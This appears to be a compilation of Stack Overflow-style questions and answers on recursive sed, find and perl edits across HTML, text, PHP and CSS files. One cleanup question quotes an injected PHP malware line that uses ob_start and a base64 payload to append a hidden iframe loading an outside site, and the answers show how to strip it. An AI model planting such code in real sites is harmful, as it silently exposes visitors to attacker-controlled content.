Recursive multiline sed - remove beginning of file until pattern match - regex

I have nested subdirectories containing html files. For each of these html files I want to delete from the top of the file until the pattern <div id="left-
This is my attempt from osx's terminal:
find . -name "*.html" -exec sed "s/.*?<div id=\"left-col/<div id=\"left-col/g" '{}' \;
I get a lot of html output in the termainal, but no files contain the substitution or are written.

There are two problems with your command. The first problem is that you aren't selecting an output location for sed. The second is that your sed script is not doing what you want it to do: the script you posted will look at each line and delete everything ON THAT LINE before the <div>. Lines without the <div> will be unaffected. You may want to try:
find . -name "*.html" -exec sed -i.BAK -n "/<div id=\"left-col/,$ p" {} \;
This will also automatically back up your files by appending .BAK to the original versions. If this is undesirable, change -i.BAK to simply -i.

You're outputting the result of the sed regex to stdout, the console, when you want to be writing it to the file.
To perform find and replace with sed, use the -i flag:
find . -name "*.html" -exec sed -i "s/.*?<div id=\"left-col/<div id=\"left-col/g" '{}' \;
Make sure you backup your files before performing this command, if possible. Otherwise you risk data-loss from a mistyped regex.

You're not storing the output of sed anywhere; that's why it's spitting out the html.

Related

Using SED to replace a domain name in a large number of HTML files

Ok, I give up. I've been trying for a couple of hours to get sed to replace an incorrectly formatted domain name in several thousand html files but I cannot seem to get the escaping of the slashes (and possibly dot/colon) correct.
Text to find:
http://www.domain.com/http
Replace with:
http
What i have tried:
sed -i 's/http:\/\/www.domain.com\/http/http/'
sed -i 's/http\\:\\/\\/www\\.domain\\.com\\/http/http/'
sed -i 's/http\:\/\/www\.domain\.com\/http/http/'
sed -i 's=http://www.domain.com/http=http='
UPDATE:
As it transpires I was chasing chasing ghosts. A piece of javascript was adding the http://www.domain.com/ to the beginning of all my img tags! Unfortunately now I need to try and remove this from all pages. So instead of the above, i am now looking to:
Replace this:
http://www.domain.com/'+img[0]
with this:
'+img[0]
I have tried the following to no avail:
find . -name "*.html" -type f -exec sed -i 's|http://www\.domain\.com/\'+img\[0\]|\'+img\[0\]|g' {} \;
find . -name "*.html" -type f -exec sed -i 's|http://www\.domain\.com/\'+img[0]|\'+img[0]|g' {} \;
I appear to be stuck on the escaping of certain chars again. Only this time when i try to run one of the above commands it just takes me to a > prompt.
You can avoid alot of the escaping by using a different delimiter. The dot . is the only character of special meaning that needs to be escaped, everything else you can match literally. Also use the global modifier with your pattern.
sed -i 's|http://www\.domain\.com/http|http|g'
Edit — You can use the following to replace the other part.
sed -i "s|http://www\.domain\.com/\('[+]img\[0\]\)|\1|g"

Pass sed output to mv

I'm trying to batch rename text files according to a string they contain.
I used sed to isolate the pattern with \( and \) as I couldn't get this to work in grep.
sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt | mv *.txt $sed.txt
(the text I want to use as filename is between html title tags)`
Where I wrote $sed would be the output of sed.
hope that's clear!
A simple loop in bash can accomplish this. If each file is valid HTML, meaning you have only one <title> tag in the file, you can rename them all this way:
for file in *.txt; do
mv "$file" `sed -n 's/<title>\([^<]*\)<\/title>/\1/p;' $file| sed -e 's/[ ][ ]*/_/g'`.txt
done
So, if you have files 1.txt, 2.txt and 3.txt, each with cat, dog and my hippo in their TITLE tags, you'll end up with cat.txt, dog.txt and my_hippo.txt after the above loop.
EDIT: quoted initial $file in case there are spaces in filenames; and added a second sed to convert any spaces in the <title> tag to _'s in resulting filenames. NOTE the whitespace inside the []'s in the second sed command is a literal space and tab character.
You can enclose expression in grave accent characters (`) to make it insert its output to the place you want. Try:
mv *.txt `sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt`.txt
It is rather not flexible, but should work.
(I haven't used it in a while and cannot test it now, so I might be wrong).
Here is the command I would use:
for i in *.txt ; do
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
done
The sed substitution search for pattern in each one of your .txt files. For each file it creates string mv 'file_name' 'found_pattern'.
With the e command at the end of sed commands, this resulting string is directly executed in terminal, thus it renames your files.
Some hints:
Note the use of =s instead of /s as delimiters for sed substition: it's more readable as you already have /s in your pattern (you could use many other symbols if you don't like =). And in this way you don't have to escape the / in your pattern.
The e command for sed executes the created string.
(I'm speaking of this one below:
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
^
)
So use it with caution! I would recommand to first use the line without final e: it won't execute any mv command, but just print instead what would be executed if you were to add the e.
What I read from your question is:
you have a number of text (html) files in a directory
each file contains at least the tag <title> ... </title>
you want to extract the content (elements.text) and use it as filename
last you want to rename that file to the extracted filename
Is this correct?
So, then you need to loop through the files, e.g. with xargs or find
ls '*.txt' | xargs -i\{\} command "{}" ...
find -maxdepth 1 -type f -name '*.txt' -exec command "{}" ... \;
I always replace the xargs substitues by -i\{\} because the resulting command is compatible if I use it sometimes with find and its substitute {}.
Next the -maxdepth option will help find not to dive deeper in directory, if no subdir, you can leave it out.
command could be something very simple like echo "Testing File: {}" or a really small script if you use it with bash:
find . -name '*.txt' -exec bash -c 'CUR_FILE="{}"; echo "Working on: $CUR_FILE"; ls -l "$CUR_FILE";' \;
The big decision for your question is: how to get the text from title element.
A simple solution (suitable if opening and closing tag is on same textline) would be by grep
A more solid solution is to use a HTML Parser and navigate by DOM operation
The simple solution base on:
get the title line
remove the everything before and after title content
So do it together:
ls *.txt | xargs -i\{\} bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"'
Same with usage of find:
find . -maxdepth 1 -type f -name '*.txt' -exec bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"' \;
Hopefully it is what you expected.

How to delete lines while preserving certain characters via sed/perl?

I'm trying to do a mass search and replace on all .php files for the following string for malware cleanup:
<?php ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vd3d3Lml3cy1sZWlwemlnLmRlL2NvbnRhY3RzLnBocCI+PC9pZnJhbWU+PC9kaXY+Jyk7PC9zY3JpcHQ+');}
I can delete the entire line via sed '/buffer.base64_decode/d' file.php. However, I still need the opening <?php
So what really needs to be done is a search and replace of buffer.base64_decode for <?php and my brain is all mashed potatoes after a long day in front of this evil computer.
Or maybe I've thought myself into a tiny box and am going about this all wrong?
Instead of deleting the line, you don't you simply change it? Here's how, using GNU sed:
sed -i '/buffer.base64_decode/c \<?php ' file.php
Now for all files in your working directory:
find . -type f -name "*.php" -exec sed -i '/buffer.base64_decode/c \<?php ' {} \;
perl -pe 's/<\?php ob_start\("security_update"\);.*?\?>//gsm; s/<\?php ob_start\("security_update"\);.*/<?php/g;' test.php

batch process regular expression find and replace on folder and subfolders contents

I have a folder with subfolders that contain text documents (hundreds). The text documents all require a find and replace. The regular expression I am using to find the text is:
^([A-Z])[\r\n]+(\w+)\b
This is being replaced by:
$1$2
How can I batch process this find and replace on a folder with subfolders?
I'm using a mac (osx 10.6.8)
You could use sed for this as well:
cd /path/to/files # make sure you are in the right directory
find . -type f -exec sed -i.bak 's/^([A-Z])[\r\n]+(\w+)\b/$1$2/g' {} \;
Edit: I just realized that the above is a Textmate search/replace string. For sed you'll have to use:
find . -type f -exec sed -i.bak 's/^([A-Z])[\r\n]+(\w+)\b/\1\2/g' {} \;
This makes a backup of all files.
You could do this using find and perl:
find ./* -exec perl -p -i -e 's/^([A-Z])[\r\n]+(\w+)\b/$1$2/g' {} \;
Warning: untested :)

sed mass replace CSS styles via terminal

I want to replace all instances of font-family: ([A-Za-z ,"]+){1}; with font-family: Verdana using sed. In the past, the following command has worked for simple search & replace:
find ./ -type f -exec sed -i 's/needle/replace/' {} \;
However, I tried the following regex with no success:
find ./ -type f -exec sed -i 's/(font\-family:){1}([\"A-Za-z, ]+){1}(;){1}/font\-family: Verdana;/' {} \;
I'm on Red Hat Enterprise Linux Server release 5.6. Additionally, the first command seems to only work on the first instance in any given file, which means I have to rerun the command until every instance gets replaced... can I improve the command to work on all instances of all files?
First, an explanation of why yours doesn't work. You need to escape all of your parentheses, square brackets, and the +, so the following should work:
sed -i 's/\(font\-family:\)\{1\}\(["A-Za-z, ]\+\)\{1\}\(;\)\{1\}/font-family: Verdana;/'
Fortunately you can add the -r switch to prevent the need for all of that escaping, but you can also simplify your current expression quite a bit. You do not need to put every section into a capturing group, and adding {1} to every group is redundant (that is basically the default). So you could reduce it to:
sed -ri 's/font-family:["A-Za-z, ]+;/font-family: Verdana;/g'
Note the added g option for global replacement, since you want this for every occurrence.
All together:
find ./ -type f -exec sed -ri 's/font-family:["A-Za-z, ]+;/font-family: Verdana;/g' {} \;
the problem is, you need -r in your sed, since you used +
see the test below:
kent$ echo "oldstring_0000"|sed 's/[0]+/newstring/'
oldstring_0000
nothing happened.
now with -r:
kent$ echo "oldstring_0000"|sed -r 's/[0]+/newstring/'
oldstring_newstring
also if you want to replace all, you need 'g' like 's/a/b/g'
I'm not sure I fully understand your font-family expresion: font-family: ([A-Za-z ,"]+){1}; Are those matching parens and you're looking for {1} exactly one match?
Your regex is just complicated enough that I'd switch from sed to perl -pi:
find ./ -type f -exec perl -pi -e 's/font-family:[\"A-Za-z, ]+;/font-family: Verdana;/g' {} \;
Try something like this -
sed -i 's/\(font-family:\) \(.*[^;]\)\(;.*\)/\1 Verdana\3/g'